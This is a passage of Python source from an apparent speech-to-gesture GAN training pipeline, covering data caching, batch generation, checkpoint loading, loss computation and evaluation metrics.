str(datetime.timedelta(seconds=time_remaining))), end='')
for dict_key in samples_dict.keys():
samples_dict[dict_key] = np.stack(samples_dict[dict_key])
if part == 'train':
self.train_samples = samples_dict
elif part == 'val':
self.val_samples = samples_dict
elif part == 'test':
self.test_samples = samples_dict
print(' Completed.')
def save_cache(self, part, dir_name):
data_s2ag = self.data_loader['{}_data_s2ag'.format(part)]
num_samples = self.num_train_samples if part == 'train' else (self.num_val_samples if part == 'val' else self.num_test_samples)
speaker_model = self.train_speaker_model if part == 'train' else (self.val_speaker_model if part == 'val' else self.test_speaker_model)
os.makedirs(dir_name, exist_ok=True) # ensure the per-sample cache directory exists before writing
extended_word_seq_all = np.zeros((num_samples, self.time_steps), dtype=np.int64)
vec_seq_all = np.zeros((num_samples, self.time_steps, self.pose_dim))
audio_all = np.zeros((num_samples, self.audio_length), dtype=np.int16)
audio_max_all = np.zeros(num_samples)
mfcc_features_all = np.zeros((num_samples, self.num_mfcc, self.mfcc_length))
vid_indices_all = np.zeros(num_samples, dtype=np.int64)
print('Caching {} data {:>6}/{}.'.format(part, 0, num_samples), end='')
for k in range(num_samples):
with data_s2ag.lmdb_env.begin(write=False) as txn:
key = '{:010}'.format(k).encode('ascii')
sample = txn.get(key)
sample = pyarrow.deserialize(sample)
word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
duration = aux_info['end_time'] - aux_info['start_time']
audio_max_all[k] = np.max(np.abs(audio))
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2ag.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
data_s2ag.remove_word_timing, word_seq,
aux_info, sample_end_time).detach().cpu().numpy()
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float().detach().cpu().numpy()
extended_word_seq_all[k] = extended_word_seq
vec_seq_all[k] = vec_seq
audio_all[k] = np.int16(audio / audio_max_all[k] * 32767)
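# Audio is stored as full-scale int16 together with its original peak
# (audio_max), so loaders can rebuild the float waveform via
# audio / 32767 * audio_max while keeping the cache compact.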
mfcc_features_all[k] = mfcc_features
vid_indices_all[k] = speaker_model.word2index[aux_info['vid']]
np.savez_compressed(jn(dir_name, str(k).zfill(6) + '.npz'), # save directly under dir_name so load_cache(load_full=False) finds the files
extended_word_seq=extended_word_seq,
vec_seq=vec_seq,
audio=np.int16(audio / audio_max_all[k] * 32767),
audio_max=audio_max_all[k],
mfcc_features=mfcc_features,
vid_indices=vid_indices_all[k])
print('\rCaching {} data {:>6}/{}.'.format(part, k + 1, num_samples), end='')
print('\t Storing full cache', end='')
full_cache_path = jn(dir_name, '../full')
os.makedirs(full_cache_path, exist_ok=True)
np.savez_compressed(jn(full_cache_path, part + '.npz'),
extended_word_seq=extended_word_seq_all,
vec_seq=vec_seq_all, audio=audio_all, audio_max=audio_max_all,
mfcc_features=mfcc_features_all,
vid_indices=vid_indices_all)
print(' done.')
def process_data(self, data, poses, quat, trans, affs):
data = data.float().to(self.device)
poses = poses.float().to(self.device)
quat = quat.float().to(self.device)
trans = trans.float().to(self.device)
affs = affs.float().to(self.device)
return data, poses, quat, trans, affs
def load_model_at_epoch(self, epoch='best'):
model_name, self.best_s2ag_loss_epoch, self.best_s2ag_loss = \
get_epoch_and_loss(self.args.work_dir_s2ag, epoch=epoch)
model_found = False
try:
loaded_vars = torch.load(jn(self.args.work_dir_s2ag, model_name))
self.s2ag_generator.load_state_dict(loaded_vars['gen_model_dict'])
self.s2ag_discriminator.load_state_dict(loaded_vars['dis_model_dict'])
model_found = True
except (FileNotFoundError, IsADirectoryError):
if epoch == 'best':
print('Warning! No saved model found.')
else:
print('Warning! No saved model found at epoch {}.'.format(epoch))
return model_found
def adjust_lr_s2ag(self):
self.lr_s2ag_gen = self.lr_s2ag_gen * self.args.lr_s2ag_decay
for param_group in self.s2ag_gen_optimizer.param_groups:
param_group['lr'] = self.lr_s2ag_gen
self.lr_s2ag_dis = self.lr_s2ag_dis * self.args.lr_s2ag_decay
for param_group in self.s2ag_dis_optimizer.param_groups:
param_group['lr'] = self.lr_s2ag_dis
def show_epoch_info(self):
best_metrics = [self.best_s2ag_loss]
print_epochs = [self.best_s2ag_loss_epoch
if self.best_s2ag_loss_epoch is not None else 0] * len(best_metrics)
i = 0
for k, v in self.epoch_info.items():
self.io.print_log('\t{}: {}. Best so far: {:.4f} (epoch: {:d}).'.
format(k, v, best_metrics[i], print_epochs[i]))
i += 1
if self.args.pavi_log:
self.io.log('train', self.meta_info['iter'], self.epoch_info)
def show_iter_info(self):
if self.meta_info['iter'] % self.args.log_interval == 0:
info = '\tIter {} Done.'.format(self.meta_info['iter'])
for k, v in self.iter_info.items():
if isinstance(v, float):
info = info + ' | {}: {:.4f}'.format(k, v)
else:
info = info + ' | {}: {}'.format(k, v)
self.io.print_log(info)
if self.args.pavi_log:
self.io.log('train', self.meta_info['iter'], self.iter_info)
def count_parameters(self):
return sum(p.numel() for p in self.s2ag_generator.parameters() if p.requires_grad)
@staticmethod
def extend_word_seq(n_frames, lang, remove_word_timing, words, aux_info, end_time=None):
if end_time is None:
end_time = aux_info['end_time']
frame_duration = (end_time - aux_info['start_time']) / n_frames
extended_word_indices = np.zeros(n_frames) # zero is the index of padding token
if remove_word_timing:
n_words = 0
for word in words:
idx = max(0, int(np.floor((word[1] - aux_info['start_time']) / frame_duration)))
if idx < n_frames:
n_words += 1
space = int(n_frames / (n_words + 1))
for word_idx in range(n_words):
idx = (word_idx + 1) * space
extended_word_indices[idx] = lang.get_word_index(words[word_idx][0])
else:
prev_idx = 0
for word in words:
idx = max(0, int(np.floor((word[1] - aux_info['start_time']) / frame_duration)))
if idx < n_frames:
extended_word_indices[idx] = lang.get_word_index(word[0])
# extended_word_indices[prev_idx:idx+1] = lang.get_word_index(word[0])
prev_idx = idx
return torch.Tensor(extended_word_indices).long()
@staticmethod
def words_to_tensor(lang, words, end_time=None):
indexes = [lang.SOS_token]
for word in words:
if end_time is not None and word[1] > end_time:
break
indexes.append(lang.get_word_index(word[0]))
indexes.append(lang.EOS_token)
return torch.Tensor(indexes).long()
def yield_batch_old(self, train):
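# NOTE: legacy batching path. It expects cache keys ('word_seq', 'pose_seq',
# 'aux_info') that save_cache/load_cache above no longer produce, so it only
# works with an older cache format; yield_batch below is the current path.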
batch_word_seq_tensor = torch.zeros((self.args.batch_size, self.time_steps)).long().to(self.device)
batch_word_seq_lengths = torch.zeros(self.args.batch_size).long().to(self.device)
batch_extended_word_seq = torch.zeros((self.args.batch_size, self.time_steps)).long().to(self.device)
batch_pose_seq = torch.zeros((self.args.batch_size, self.time_steps,
self.pose_dim + self.coords)).float().to(self.device)
batch_vec_seq = torch.zeros((self.args.batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_audio = torch.zeros((self.args.batch_size, self.audio_length)).float().to(self.device)
batch_spectrogram = torch.zeros((self.args.batch_size, 128,
self.spectrogram_length)).float().to(self.device)
batch_mfcc = torch.zeros((self.args.batch_size, self.num_mfcc,
self.mfcc_length)).float().to(self.device)
batch_vid_indices = torch.zeros(self.args.batch_size).long().to(self.device)
if train:
data_s2ag = self.data_loader['train_data_s2ag']
num_data = self.num_train_samples
else:
data_s2ag = self.data_loader['val_data_s2ag']
num_data = self.num_val_samples
pseudo_passes = (num_data + self.args.batch_size - 1) // self.args.batch_size
prob_dist = np.ones(num_data) / float(num_data)
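# One "epoch" is approximated by ceil(num_data / batch_size) pseudo-passes of
# uniform sampling with replacement, so every sample is equally likely to be
# drawn but exact single-visit coverage is not guaranteed.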
# def load_from_txn(_txn, _i, _k):
# key = '{:010}'.format(_k).encode('ascii')
# sample = _txn.get(key)
# sample = pyarrow.deserialize(sample)
# word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
#
# # vid_name = sample[-1]['vid']
# # clip_start = str(sample[-1]['start_time'])
# # clip_end = str(sample[-1]['end_time'])
#
# duration = aux_info['end_time'] - aux_info['start_time']
# do_clipping = True
#
# if do_clipping:
# sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
# audio = make_audio_fixed_length(audio, self.audio_length)
# spectrogram = spectrogram[:, 0:self.spectrogram_length]
# mfcc_features = mfcc_features[:, 0:self.mfcc_length]
# vec_seq = vec_seq[0:data_s2ag.n_poses]
# pose_seq = pose_seq[0:data_s2ag.n_poses]
# else:
# sample_end_time = None
#
# # to tensors
# word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
# extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
# data_s2ag.remove_word_timing, word_seq,
# aux_info, sample_end_time)
# vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
# pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
# # scaled_audio = np.int16(audio / np.max(np.abs(audio)) * self.audio_length)
# mfcc_features = torch.from_numpy(mfcc_features).float()
# audio = torch.from_numpy(audio).float()
# spectrogram = torch.from_numpy(spectrogram)
#
# batch_word_seq_tensor[_i, :len(word_seq_tensor)] = word_seq_tensor
# batch_word_seq_lengths[_i] = len(word_seq_tensor)
# batch_extended_word_seq[_i] = extended_word_seq
# batch_pose_seq[_i] = pose_seq
# batch_vec_seq[_i] = vec_seq
# batch_audio[_i] = audio
# batch_spectrogram[_i] = spectrogram
# batch_mfcc[_i] = mfcc_features
# # speaker input
# if train:
# if self.train_speaker_model and self.train_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[_i] = \
# torch.LongTensor([self.train_speaker_model.word2index[aux_info['vid']]])
# else:
# if self.val_speaker_model and self.val_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[_i] = \
# torch.LongTensor([self.val_speaker_model.word2index[aux_info['vid']]])
for p in range(pseudo_passes):
rand_keys = np.random.choice(num_data, size=self.args.batch_size, replace=True, p=prob_dist)
for i, k in enumerate(rand_keys):
if train:
word_seq = self.train_samples['word_seq'].item()[str(k).zfill(6)]
pose_seq = self.train_samples['pose_seq'][k]
vec_seq = self.train_samples['vec_seq'][k]
audio = self.train_samples['audio'][k] / 32767 * self.train_samples['audio_max'][k]
mfcc_features = self.train_samples['mfcc_features'][k]
aux_info = self.train_samples['aux_info'].item()[str(k).zfill(6)]
else:
word_seq = self.val_samples['word_seq'].item()[str(k).zfill(6)]
pose_seq = self.val_samples['pose_seq'][k]
vec_seq = self.val_samples['vec_seq'][k]
audio = self.val_samples['audio'][k] / 32767 * self.val_samples['audio_max'][k]
mfcc_features = self.val_samples['mfcc_features'][k]
aux_info = self.val_samples['aux_info'].item()[str(k).zfill(6)]
duration = aux_info['end_time'] - aux_info['start_time']
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2ag.n_poses]
pose_seq = pose_seq[0:data_s2ag.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
data_s2ag.remove_word_timing, word_seq,
aux_info, sample_end_time)
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
# scaled_audio = np.int16(audio / np.max(np.abs(audio)) * self.audio_length)
mfcc_features = torch.from_numpy(mfcc_features).float()
audio = torch.from_numpy(audio).float()
batch_word_seq_tensor[i, :len(word_seq_tensor)] = word_seq_tensor
batch_word_seq_lengths[i] = len(word_seq_tensor)
batch_extended_word_seq[i] = extended_word_seq
batch_pose_seq[i] = pose_seq
batch_vec_seq[i] = vec_seq
batch_audio[i] = audio
batch_mfcc[i] = mfcc_features
# speaker input
if train:
if self.train_speaker_model and self.train_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices[i] = \
torch.LongTensor([self.train_speaker_model.word2index[aux_info['vid']]])
else:
if self.val_speaker_model and self.val_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices[i] = \
torch.LongTensor([self.val_speaker_model.word2index[aux_info['vid']]])
# with data_s2ag.lmdb_env.begin(write=False) as txn:
# threads = []
# for i, k in enumerate(rand_keys):
# threads.append(threading.Thread(target=load_from_txn, args=[i, k]))
# threads[i].start()
# for i in range(len(rand_keys)):
# threads[i].join()
yield batch_word_seq_tensor, batch_word_seq_lengths, batch_extended_word_seq, batch_pose_seq, \
batch_vec_seq, batch_audio, batch_spectrogram, batch_mfcc, batch_vid_indices
def yield_batch(self, train):
if train:
data_s2ag = self.data_loader['train_data_s2ag']
num_data = self.num_train_samples
else:
data_s2ag = self.data_loader['val_data_s2ag']
num_data = self.num_val_samples
pseudo_passes = (num_data + self.args.batch_size - 1) // self.args.batch_size
prob_dist = np.ones(num_data) / float(num_data)
for p in range(pseudo_passes):
rand_keys = np.random.choice(num_data, size=self.args.batch_size, replace=True, p=prob_dist)
if train:
batch_extended_word_seq = torch.from_numpy(
self.train_samples['extended_word_seq'][rand_keys]).to(self.device)
batch_vec_seq = torch.from_numpy(self.train_samples['vec_seq'][rand_keys]).float().to(self.device)
batch_audio = torch.from_numpy(
self.train_samples['audio'][rand_keys] *
self.train_samples['audio_max'][rand_keys, None] / 32767).float().to(self.device)
batch_mfcc_features = torch.from_numpy(
self.train_samples['mfcc_features'][rand_keys]).float().to(self.device)
curr_vid_indices = self.train_samples['vid_indices'][rand_keys]
else:
batch_extended_word_seq = torch.from_numpy(
self.val_samples['extended_word_seq'][rand_keys]).to(self.device)
batch_vec_seq = torch.from_numpy(self.val_samples['vec_seq'][rand_keys]).float().to(self.device)
batch_audio = torch.from_numpy(
self.val_samples['audio'][rand_keys] *
self.val_samples['audio_max'][rand_keys, None] / 32767).float().to(self.device)
batch_mfcc_features = torch.from_numpy(
self.val_samples['mfcc_features'][rand_keys]).float().to(self.device)
curr_vid_indices = self.val_samples['vid_indices'][rand_keys]
# speaker input
batch_vid_indices = None
if train and self.train_speaker_model and\
self.train_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices = torch.LongTensor([
np.random.choice(np.setdiff1d(list(self.train_speaker_model.word2index.values()),
curr_vid_indices))
for _ in range(self.args.batch_size)]).to(self.device)
elif self.val_speaker_model and\
self.val_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices = torch.LongTensor([
np.random.choice(np.setdiff1d(list(self.val_speaker_model.word2index.values()),
curr_vid_indices))
for _ in range(self.args.batch_size)]).to(self.device)
yield batch_extended_word_seq, batch_vec_seq, batch_audio, batch_mfcc_features, batch_vid_indices
def return_batch(self, batch_size, randomized=True):
data_s2ag = self.data_loader['test_data_s2ag']
if len(batch_size) > 1:
rand_keys = np.copy(batch_size)
batch_size = len(batch_size)
else:
batch_size = batch_size[0]
prob_dist = np.ones(self.num_test_samples) / float(self.num_test_samples)
if randomized:
rand_keys = np.random.choice(self.num_test_samples, size=batch_size, replace=False, p=prob_dist)
else:
rand_keys = np.arange(batch_size)
batch_words = [[] for _ in range(batch_size)]
batch_aux_info = [[] for _ in range(batch_size)]
batch_word_seq_tensor = torch.zeros((batch_size, self.time_steps)).long().to(self.device)
batch_word_seq_lengths = torch.zeros(batch_size).long().to(self.device)
batch_extended_word_seq = torch.zeros((batch_size, self.time_steps)).long().to(self.device)
batch_pose_seq = torch.zeros((batch_size, self.time_steps,
self.pose_dim + self.coords)).float().to(self.device)
batch_vec_seq = torch.zeros((batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_target_seq = torch.zeros((batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_audio = torch.zeros((batch_size, self.audio_length)).float().to(self.device)
batch_spectrogram = torch.zeros((batch_size, 128,
self.spectrogram_length)).float().to(self.device)
batch_mfcc = torch.zeros((batch_size, self.num_mfcc,
self.mfcc_length)).float().to(self.device)
for i, k in enumerate(rand_keys):
with data_s2ag.lmdb_env.begin(write=False) as txn:
key = '{:010}'.format(k).encode('ascii')
sample = txn.get(key)
sample = pyarrow.deserialize(sample)
word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
# for selected_vi in range(len(word_seq)): # make start time of input text zero
# word_seq[selected_vi][1] -= aux_info['start_time'] # start time
# word_seq[selected_vi][2] -= aux_info['start_time'] # end time
batch_words[i] = [word_seq[i][0] for i in range(len(word_seq))]
batch_aux_info[i] = aux_info
duration = aux_info['end_time'] - aux_info['start_time']
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
spectrogram = spectrogram[:, 0:self.spectrogram_length]
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2ag.n_poses]
pose_seq = pose_seq[0:data_s2ag.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
data_s2ag.remove_word_timing, word_seq,
aux_info, sample_end_time)
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
target_seq = convert_pose_seq_to_dir_vec(pose_seq)
target_seq = target_seq.reshape(target_seq.shape[0], -1)
target_seq -= np.reshape(self.s2ag_config_args.mean_dir_vec, -1)
mfcc_features = torch.from_numpy(mfcc_features)
audio = torch.from_numpy(audio).float()
spectrogram = torch.from_numpy(spectrogram)
batch_word_seq_tensor[i, :len(word_seq_tensor)] = word_seq_tensor
batch_word_seq_lengths[i] = len(word_seq_tensor)
batch_extended_word_seq[i] = extended_word_seq
batch_pose_seq[i] = pose_seq
batch_vec_seq[i] = vec_seq
batch_target_seq[i] = torch.from_numpy(target_seq).float()
batch_audio[i] = audio
batch_spectrogram[i] = spectrogram
batch_mfcc[i] = mfcc_features
# speaker input
# if self.test_speaker_model and self.test_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[i] = \
# torch.LongTensor([self.test_speaker_model.word2index[aux_info['vid']]])
batch_vid_indices = torch.LongTensor(
[np.random.choice(list(self.test_speaker_model.word2index.values()))
for _ in range(batch_size)]).to(self.device)
return batch_words, batch_aux_info, batch_word_seq_tensor, batch_word_seq_lengths, \
batch_extended_word_seq, batch_pose_seq, batch_vec_seq, batch_target_seq, batch_audio, \
batch_spectrogram, batch_mfcc, batch_vid_indices
@staticmethod
def add_noise(data):
noise = torch.randn_like(data) * 0.1
return data + noise
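    # Usage sketch: add_noise applies Gaussian instance noise (std 0.1) to the
    # discriminator inputs, e.g.
    #   dis_real = D(Processor.add_noise(target_poses), in_text)
    #   dis_fake = D(Processor.add_noise(out_dir_vec.detach()), in_text)
    # (see the use_noisy_target branch in forward_pass_s2ag below).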
@staticmethod
def push_samples(evaluator, target, out_dir_vec, in_text_padded, in_audio,
losses_all, joint_mae, accel, mean_dir_vec, n_poses, n_pre_poses):
batch_size = len(target)
# if evaluator:
# evaluator.reset()
loss = F.l1_loss(out_dir_vec, target)
losses_all.update(loss.item(), batch_size)
if evaluator:
evaluator.push_samples(in_text_padded, in_audio, out_dir_vec, target)
# calculate MAE of joint coordinates
out_dir_vec_np = out_dir_vec.detach().cpu().numpy()
out_dir_vec_np += np.array(mean_dir_vec).squeeze()
out_joint_poses = convert_dir_vec_to_pose(out_dir_vec_np)
target_vec = target.detach().cpu().numpy()
target_vec += np.array(mean_dir_vec).squeeze()
target_poses = convert_dir_vec_to_pose(target_vec)
if out_joint_poses.shape[1] == n_poses:
diff = out_joint_poses[:, n_pre_poses:] - \
target_poses[:, n_pre_poses:]
else:
diff = out_joint_poses - target_poses[:, n_pre_poses:]
mae_val = np.mean(np.absolute(diff))
joint_mae.update(mae_val, batch_size)
# accel
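        # np.diff with n=2 along the time axis gives second-order finite
        # differences, i.e. per-frame acceleration; the metric below is the
        # mean absolute difference between target and predicted accelerations.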
target_acc = np.diff(target_poses, n=2, axis=1)
out_acc = np.diff(out_joint_poses, n=2, axis=1)
accel.update(np.mean(np.abs(target_acc - out_acc)), batch_size)
return evaluator, losses_all, joint_mae, accel
def forward_pass_s2ag(self, in_text, in_audio, in_mfcc, target_poses, vid_indices, train,
target_seq=None, words=None, aux_info=None, save_path=None, make_video=False,
calculate_metrics=False, losses_all_trimodal=None, joint_mae_trimodal=None,
accel_trimodal=None, losses_all=None, joint_mae=None, accel=None):
warm_up_epochs = self.s2ag_config_args.loss_warmup
use_noisy_target = False
# make pre seq input
pre_seq = target_poses.new_zeros((target_poses.shape[0], target_poses.shape[1],
target_poses.shape[2] + 1))
pre_seq[:, 0:self.s2ag_config_args.n_pre_poses, :-1] =\
target_poses[:, 0:self.s2ag_config_args.n_pre_poses]
pre_seq[:, 0:self.s2ag_config_args.n_pre_poses, -1] = 1 # indicating bit for constraints
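        # pre_seq layout: the first n_pre_poses frames carry the seed poses in
        # the leading pose_dim channels, and the extra last channel is a 0/1
        # mask telling the generator which frames are constrained.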
###########################################################################################
# train D
dis_error = None
if self.meta_info['epoch'] > warm_up_epochs and self.s2ag_config_args.loss_gan_weight > 0.0:
self.s2ag_dis_optimizer.zero_grad()
# out shape (batch x seq x dim)
if self.use_mfcc:
out_dir_vec, *_ = self.s2ag_generator(pre_seq, in_text, in_mfcc, vid_indices)
else:
out_dir_vec, *_ = self.s2ag_generator(pre_seq, in_text, in_audio, vid_indices)
if use_noisy_target:
noise_target = Processor.add_noise(target_poses)
noise_out = Processor.add_noise(out_dir_vec.detach())
dis_real = self.s2ag_discriminator(noise_target, in_text)
dis_fake = self.s2ag_discriminator(noise_out, in_text)
else:
dis_real = self.s2ag_discriminator(target_poses, in_text)
dis_fake = self.s2ag_discriminator(out_dir_vec.detach(), in_text)
dis_error = torch.sum(-torch.mean(torch.log(dis_real + 1e-8) + torch.log(1 - dis_fake + 1e-8))) # ns-gan
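            # Non-saturating GAN discriminator loss:
            #   L_D = -E[log D(real)] - E[log(1 - D(fake))]
            # with 1e-8 added inside the logs for numerical stability.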
if train:
dis_error.backward()
self.s2ag_dis_optimizer.step()
###########################################################################################
# train G
self.s2ag_gen_optimizer.zero_grad()
# decoding
out_dir_vec_trimodal, *_ = self.trimodal_generator(pre_seq, in_text, in_audio, vid_indices)
if self.use_mfcc:
out_dir_vec, z, z_mu, z_log_var = self.s2ag_generator(pre_seq, in_text, in_mfcc, vid_indices)
else:
out_dir_vec, z, z_mu, z_log_var = self.s2ag_generator(pre_seq, in_text, in_audio, vid_indices)
# make a video
        assert not make_video or target_seq is not None, \
            'target_seq cannot be None when make_video is True'
        assert not make_video or words is not None, \
            'words cannot be None when make_video is True'
        assert not make_video or aux_info is not None, \
            'aux_info cannot be None when make_video is True'
        assert not make_video or save_path is not None, \
            'save_path cannot be None when make_video is True'
if make_video:
sentence_words = []
for word in words:
sentence_words.append(word)
sentences = [' '.join(sentence_word) for sentence_word in sentence_words]
num_videos = len(aux_info)
for vid_idx in range(num_videos):
start_time = time.time()
filename_prefix = '{}_{}'.format(aux_info[vid_idx]['vid'], vid_idx)
filename_prefix_for_video = filename_prefix
aux_str = '({}, time: {}-{})'.format(aux_info[vid_idx]['vid'],
str(datetime.timedelta(
seconds=aux_info[vid_idx]['start_time'])),
str(datetime.timedelta(
seconds=aux_info[vid_idx]['end_time'])))
create_video_and_save(
save_path, 0, filename_prefix_for_video, 0,
target_seq[vid_idx].cpu().numpy(),
out_dir_vec_trimodal[vid_idx].cpu().numpy(), out_dir_vec[vid_idx].cpu().numpy(),
np.reshape(self.s2ag_config_args.mean_dir_vec, -1), sentences[vid_idx],
audio=in_audio[vid_idx].cpu().numpy(), aux_str=aux_str,
clipping_to_shortest_stream=True, delete_audio_file=False)
print('\rRendered {} of {} videos. Last one took {:.2f} seconds.'.format(vid_idx + 1,
num_videos,
time.time() - start_time),
end='')
print()
# calculate metrics
        assert not calculate_metrics or target_seq is not None, \
            'target_seq cannot be None when calculate_metrics is True'
        assert not calculate_metrics or losses_all_trimodal is not None, \
            'losses_all_trimodal cannot be None when calculate_metrics is True'
        assert not calculate_metrics or joint_mae_trimodal is not None, \
            'joint_mae_trimodal cannot be None when calculate_metrics is True'
        assert not calculate_metrics or accel_trimodal is not None, \
            'accel_trimodal cannot be None when calculate_metrics is True'
        assert not calculate_metrics or losses_all is not None, \
            'losses_all cannot be None when calculate_metrics is True'
        assert not calculate_metrics or joint_mae is not None, \
            'joint_mae cannot be None when calculate_metrics is True'
        assert not calculate_metrics or accel is not None, \
            'accel cannot be None when calculate_metrics is True'
if calculate_metrics:
self.evaluator_trimodal, losses_all_trimodal, joint_mae_trimodal, accel_trimodal =\
Processor.push_samples(self.evaluator_trimodal, target_seq, out_dir_vec_trimodal,
in_text, in_audio, losses_all_trimodal, joint_mae_trimodal, accel_trimodal,
self.s2ag_config_args.mean_dir_vec, self.s2ag_config_args.n_poses,
self.s2ag_config_args.n_pre_poses)
self.evaluator, losses_all, joint_mae, accel =\
Processor.push_samples(self.evaluator, target_seq, out_dir_vec,
in_text, in_audio, losses_all, joint_mae, accel,
self.s2ag_config_args.mean_dir_vec, self.s2ag_config_args.n_poses,
self.s2ag_config_args.n_pre_poses)
# loss
beta = 0.1
huber_loss = F.smooth_l1_loss(out_dir_vec / beta, target_poses / beta) * beta
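        # Scaling by 1/beta before smooth_l1_loss and multiplying the result by
        # beta moves the quadratic-to-linear transition point of the Huber loss
        # from 1 to beta (= 0.1 here), making it more sensitive to small errors.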
dis_output = self.s2ag_discriminator(out_dir_vec, in_text)
gen_error = -torch.mean(torch.log(dis_output + 1e-8))
kld = div_reg = None
if (self.s2ag_config_args.z_type == 'speaker' or self.s2ag_config_args.z_type == 'random') and \
self.s2ag_config_args.loss_reg_weight > 0.0:
if self.s2ag_config_args.z_type == 'speaker':
# enforcing divergent gestures btw original vid and other vid
rand_idx = torch.randperm(vid_indices.shape[0])
rand_vids = vid_indices[rand_idx]
else:
rand_vids = None
if self.use_mfcc:
out_dir_vec_rand_vid, z_rand_vid, _, _ = self.s2ag_generator(pre_seq, in_text, in_mfcc, rand_vids)
else:
out_dir_vec_rand_vid, z_rand_vid, _, _ = self.s2ag_generator(pre_seq, in_text, in_audio, rand_vids)
beta = 0.05
pose_l1 = F.smooth_l1_loss(out_dir_vec / beta, out_dir_vec_rand_vid.detach() / beta,
reduction='none') * beta
pose_l1 = pose_l1.sum(dim=1).sum(dim=1)
pose_l1 = pose_l1.view(pose_l1.shape[0], -1).mean(1)
z_l1 = F.l1_loss(z.detach(), z_rand_vid.detach(), reduction='none')
z_l1 = z_l1.view(z_l1.shape[0], -1).mean(1)
div_reg = -(pose_l1 / (z_l1 + 1.0e-5))
div_reg = torch.clamp(div_reg, min=-1000)
div_reg = div_reg.mean()
if self.s2ag_config_args.z_type == 'speaker':
# speaker embedding KLD
kld = -0.5 * torch.mean(1 + z_log_var - z_mu.pow(2) - z_log_var.exp())
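                # Closed-form KL divergence between N(z_mu, exp(z_log_var)) and
                # the standard normal prior N(0, I), averaged over the batch.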
loss = self.s2ag_config_args.loss_regression_weight * huber_loss + \
self.s2ag_config_args.loss_kld_weight * kld + \
self.s2ag_config_args.loss_reg_weight * div_reg
else:
loss = self.s2ag_config_args.loss_regression_weight * huber_loss + \
self.s2ag_config_args.loss_reg_weight * div_reg
else:
loss = self.s2ag_config_args.loss_regression_weight * huber_loss # + var_loss
if self.meta_info['epoch'] > warm_up_epochs:
loss += self.s2ag_config_args.loss_gan_weight * gen_error
if train:
loss.backward()
self.s2ag_gen_optimizer.step()
loss_dict = {'loss': self.s2ag_config_args.loss_regression_weight * huber_loss.item()}
        if kld is not None:
            loss_dict['KLD'] = self.s2ag_config_args.loss_kld_weight * kld.item()
        if div_reg is not None:
            loss_dict['DIV_REG'] = self.s2ag_config_args.loss_reg_weight * div_reg.item()
if self.meta_info['epoch'] > warm_up_epochs and self.s2ag_config_args.loss_gan_weight > 0.0:
loss_dict['gen'] = self.s2ag_config_args.loss_gan_weight * gen_error.item()
loss_dict['dis'] = dis_error.item()
# total_loss = 0.
# for loss in loss_dict.keys():
# total_loss += loss_dict[loss]
# return loss_dict, losses_all_trimodal, joint_mae_trimodal, accel_trimodal, losses_all, joint_mae, accel
return F.l1_loss(out_dir_vec, target_poses).item() - F.l1_loss(out_dir_vec_trimodal, target_poses).item(),\
losses_all_trimodal, joint_mae_trimodal, accel_trimodal, losses_all, joint_mae, accel
def per_train_epoch(self):
self.s2ag_generator.train()
self.s2ag_discriminator.train()
batch_s2ag_loss = 0.
num_batches = self.num_train_samples // self.args.batch_size + 1
start_time = time.time()
self.meta_info['iter'] = 0
for extended_word_seq, vec_seq, audio,\
mfcc_features, vid_indices in self.yield_batch(train=True):
loss, *_ = self.forward_pass_s2ag(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=True)
# Compute statistics
batch_s2ag_loss += loss
self.iter_info['s2ag_loss'] = loss
            self.iter_info['lr_gen'] = '{:.6f}'.format(self.lr_s2ag_gen)
            self.iter_info['lr_dis'] = '{:.6f}'.format(self.lr_s2ag_dis)
self.show_iter_info()
